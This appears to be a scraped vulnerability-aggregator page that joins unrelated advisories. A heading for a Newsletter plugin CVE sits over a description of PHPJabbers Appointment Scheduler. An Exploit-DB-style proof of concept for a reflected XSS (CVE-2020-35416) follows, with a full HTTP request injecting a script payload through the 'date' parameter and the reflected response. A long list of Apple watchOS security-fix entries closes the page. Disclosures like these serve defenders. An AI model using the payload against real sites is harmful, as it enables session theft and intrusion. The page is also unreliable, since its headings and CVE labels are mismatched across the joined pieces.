_Special thanks to Stefano Lissa & The Newsletter Team for their rapid response in patching these vulnerabilities._

CVE-2020-35933: Newsletter Plugin Vulnerabilities Affect Over 300,000 Sites

Multiple cross-site scripting (XSS) vulnerabilities exist in PHPJabbers Appointment Scheduler 2.3, in the index.php admin login webpage (with different request parameters), allows remote attackers to inject arbitrary web script or HTML.

    # Exploit Title: PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)# Date: 2020-12-14# Exploit Author: Andrea Intilangelo# Vendor Homepage: https://www.phpjabbers.com# Software Link: https://www.phpjabbers.com/appointment-scheduler# Version: 2.3# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 83.0, Microsoft Edge 87.0.664.60)# CVE: CVE-2020-35416Reflected Cross-Site Scripting (XSS) vulnerability in 'index.php' login-portal webpage of Stivasoft/PHPJabbers Appointment Scheduler v2.3 (and many others, in example from "ilmiogestionale.eu", since some companies/web agencies did a script rebrand/rework) allows remote attacker to inject arbitrary script or HTML.Request parameters affected: "date", "action", arbitrarily supplied URL parameters, possible others.PoC Request:GET /index.php?controller=pjFrontPublic&action=pjActionServices&cid=1&layout=1&date=%3cscript%3ealert(1)%3c%2fscript%3e&theme=theme9 HTTP/1.1Host: [removed]Connection: closeAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36X-Requested-With: XMLHttpRequestSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://[removed]Accept-Encoding: gzip, deflateAccept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7Cookie: _ga=GA1.2.505990147.1607596638; _gid=GA1.2.1747301294.1607596638; AppointmentScheduler=5630ae3ab2ed56dbe79c033b84565422PoC Response:HTTP/1.1 200 OKServer: nginxDate: Thu, 14 Dec 2020 10:48:41 GMTContent-Type: text/html; charset=utf-8Connection: closeVary: Accept-EncodingExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Origin: *Access-Control-Allow-Credentials: trueAccess-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Headers: Origin, X-Requested-WithContent-Length: 13988<div class="container-fluid">   <div class="row">       <div class="col-lg-4 col-md-4 col-sm-4 col-xs-12">           <div class="panel panel-default pjAsContainer pjAsAside">               <div class="panel-heading p...[SNIP]...<div class="pj-calendar-ym">Dicembre, <script>alert(1)</script></div>...[SNIP]...PoC Screenshots:https://imgrz.com/item/naqZhttps://imgrz.com/item/ngZ1orhttps://imagebin.ca/v/5kkKgOdFS9n5https://imagebin.ca/v/5kkKlhi4amhj

CVE-2020-35416: PHPJabbers Appointment Scheduler 2.3 Cross Site Scripting ≈ Packet Storm

A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.0.1, Safari 14.0.1. Visiting a malicious website may lead to address bar spoofing.

CVE-2020-9945: About the security content of macOS Big Sur 11.0.1

An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.0.1, watchOS 7.0, tvOS 14.0, iOS 14.0 and iPadOS 14.0. A malicious application may be able to read restricted memory.

Released September 16, 2020

**Audio**

Available for: Apple Watch Series 3 and later

Impact: A malicious application may be able to read restricted memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2020-9943: JunDong Xie of Ant Group Light-Year Security Lab

Entry added November 12, 2020

**Audio**

Available for: Apple Watch Series 3 and later

Impact: An application may be able to read restricted memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2020-9944: JunDong Xie of Ant Group Light-Year Security Lab

Entry added November 12, 2020

**CoreAudio**

Available for: Apple Watch Series 3 and later

Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-9960: JunDong Xie and Xingwei Lin of Ant Security Light-Year Lab

Entry added March 16, 2021

**CoreAudio**

Available for: Apple Watch Series 3 and later

Impact: Playing a malicious audio file may lead to arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2020-9954: Francis working with Trend Micro Zero Day Initiative, JunDong Xie of Ant Group Light-Year Security Lab

Entry added November 12, 2020

**CoreCapture**

Available for: Apple Watch Series 3 and later

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2020-9949: Proteas

Entry added November 12, 2020

**CoreText**

Available for: Apple Watch Series 3 and later

Impact: Processing a maliciously crafted text file may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

CVE-2020-9999: Apple

Entry added December 15, 2020

**Disk Images**

Available for: Apple Watch Series 3 and later

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-9965: Proteas

CVE-2020-9966: Proteas

Entry added November 12, 2020

**FontParser**

Available for: Apple Watch Series 3 and later

Impact: A malicious application may be able to read restricted memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-29629: an anonymous researcher

Entry added January 19, 2022

**FontParser**

Available for: Apple Watch Series 3 and later

Impact: Processing a maliciously crafted font file may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-9956: Mickey Jin and Junzhi Lu of Trend Micro Mobile Security Research Team working with Trend Micro’s Zero Day Initiative

Entry added March 16, 2021

**FontParser**

Available for: Apple Watch Series 3 and later

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: A buffer overflow was addressed with improved size validation.

CVE-2020-9962: Yiğit Can YILMAZ (@yilmazcanyigit)

Entry added March 16, 2021

**FontParser**

Available for: Apple Watch Series 3 and later

Impact: Processing a maliciously crafted font file may lead to arbitrary code execution

Description: A memory corruption issue existed in the processing of font files. This issue was addressed with improved input validation.

CVE-2020-27931: Apple

Entry added March 16, 2021

**FontParser**

Available for: Apple Watch Series 3 and later

Impact: Processing a maliciously crafted font may result in the disclosure of process memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2020-29639: Mickey Jin & Qi Sun of Trend Micro working with Trend Micro's Zero Day Initiative

Entry added July 21, 2021

**HomeKit**

Available for: Apple Watch Series 3 and later

Impact: An attacker in a privileged network position may be able to unexpectedly alter application state

Description: This issue was addressed with improved setting propagation.

CVE-2020-9978: Luyi Xing,  Dongfang Zhao, and Xiaofeng Wang of Indiana University Bloomington,  Yan Jia of Xidian University and University of Chinese Academy of Sciences, and Bin Yuan of HuaZhong University of Science and Technology

Entry added March 16, 2021

**ImageIO**

Available for: Apple Watch Series 3 and later

Impact: Processing a maliciously crafted tiff file may lead to a denial-of-service or potentially disclose memory contents

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-36521: Xingwei Lin of Ant-Financial Light-Year Security Lab

Entry added May 25, 2022

**ImageIO**

Available for: Apple Watch Series 3 and later

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-9961: Xingwei Lin of Ant Security Light-Year Lab

Entry added November 12, 2020

**ImageIO**

Available for: Apple Watch Series 3 and later

Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2020-9876: Mickey Jin of Trend Micro

Entry added November 12, 2020

**ImageIO**

Available for: Apple Watch Series 3 and later

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2020-9955: Mickey Jin of Trend Micro, Xingwei Lin of Ant Security Light-Year Lab

Entry added December 15, 2020

**Kernel**

Available for: Apple Watch Series 3 and later

Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory

Description: Multiple memory corruption issues were addressed with improved input validation.

CVE-2020-9967: Alex Plaskett (@alexjplaskett)

Entry added March 16, 2021

**Kernel**

Available for: Apple Watch Series 3 and later

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2020-9975: Tielei Wang of Pangu Lab

Entry added March 16, 2021

**Keyboard**

Available for: Apple Watch Series 3 and later

Impact: A malicious application may be able to leak sensitive user information

Description: A logic issue was addressed with improved state management.

CVE-2020-9976: Rias A. Sherzad of JAIDE GmbH in Hamburg, Germany

**libxml2**

Available for: Apple Watch Series 3 and later

Impact: Processing a maliciously crafted file may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2020-9981: found by OSS-Fuzz

Entry added November 12, 2020

**libxpc**

Available for: Apple Watch Series 3 and later

Impact: A malicious application may be able to elevate privileges

Description: A logic issue was addressed with improved validation.

CVE-2020-9971: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab

Entry added December 15, 2020

**Mail**

Available for: Apple Watch Series 3 and later

Impact: A remote attacker may be able to unexpectedly alter application state

Description: This issue was addressed with improved checks.

CVE-2020-9941: Fabian Ising of FH Münster University of Applied Sciences and Damian Poddebniak of FH Münster University of Applied Sciences

Entry added November 12, 2020

**Messages**

Available for: Apple Watch Series 3 and later

Impact: A local user may be able to discover a user’s deleted messages

Description: The issue was addressed with improved deletion.

CVE-2020-9989: von Brunn Media

Entry added November 12, 2020

**Phone**

Available for: Apple Watch Series 3 and later

Impact: The screen lock may not engage after the specified time period

Description: This issue was addressed with improved checks.

CVE-2020-9946: Daniel Larsson of iolight AB

**Safari**

Available for: Apple Watch Series 3 and later

Impact: Visiting a malicious website may lead to address bar spoofing

Description: The issue was addressed with improved UI handling.

CVE-2020-9993: Masato Sugiyama (@smasato) of University of Tsukuba, Piotr Duszynski

Entry added November 12, 2020

**Sandbox**

Available for: Apple Watch Series 3 and later

Impact: A local user may be able to view senstive user information

Description: An access issue was addressed with additional sandbox restrictions.

CVE-2020-9969: Wojciech Reguła of SecuRing (wojciechregula.blog)

Entry added November 12, 2020

**Sandbox**

Available for: Apple Watch Series 3 and later

Impact: A malicious application may be able to access restricted files

Description: A logic issue was addressed with improved restrictions.

CVE-2020-9968: Adam Chester (@\_xpn\_) of TrustedSec

Entry updated September 17, 2020

**SQLite**

Available for: Apple Watch Series 3 and later

Impact: A remote attacker may be able to cause a denial of service

Description: This issue was addressed with improved checks.

CVE-2020-13434

CVE-2020-13435

CVE-2020-9991

Entry added November 12, 2020

**SQLite**

Available for: Apple Watch Series 3 and later

Impact: Multiple issues in SQLite

Description: Multiple issues were addressed by updating SQLite to version 3.32.3.

CVE-2020-15358

Entry added November 12, 2020

**SQLite**

Available for: Apple Watch Series 3 and later

Impact: A remote attacker may be able to leak memory

Description: An information disclosure issue was addressed with improved state management.

CVE-2020-9849

Entry added November 12, 2020

**SQLite**

Available for: Apple Watch Series 3 and later

Impact: A maliciously crafted SQL query may lead to data corruption

Description: This issue was addressed with improved checks.

CVE-2020-13631

Entry added November 12, 2020

**SQLite**

Available for: Apple Watch Series 3 and later

Impact: A remote attacker may be able to cause arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

CVE-2020-13630

Entry added November 12, 2020

**WebKit**

Available for: Apple Watch Series 3 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2020-9947: cc working with Trend Micro Zero Day Initiative

CVE-2020-9950: cc working with Trend Micro Zero Day Initiative

CVE-2020-9951: Marcin 'Icewall' Noga of Cisco Talos

Entry added November 12, 2020

**WebKit**

Available for: Apple Watch Series 3 and later

Impact: Processing maliciously crafted web content may lead to code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2020-9983: zhunki

Entry added November 12, 2020

**WebKit**

Available for: Apple Watch Series 3 and later

Impact: Processing maliciously crafted web content may lead to a cross site scripting attack

Description: An input validation issue was addressed with improved input validation.

CVE-2020-9952: Ryan Pickren (ryanpickren.com)

Tag

#apple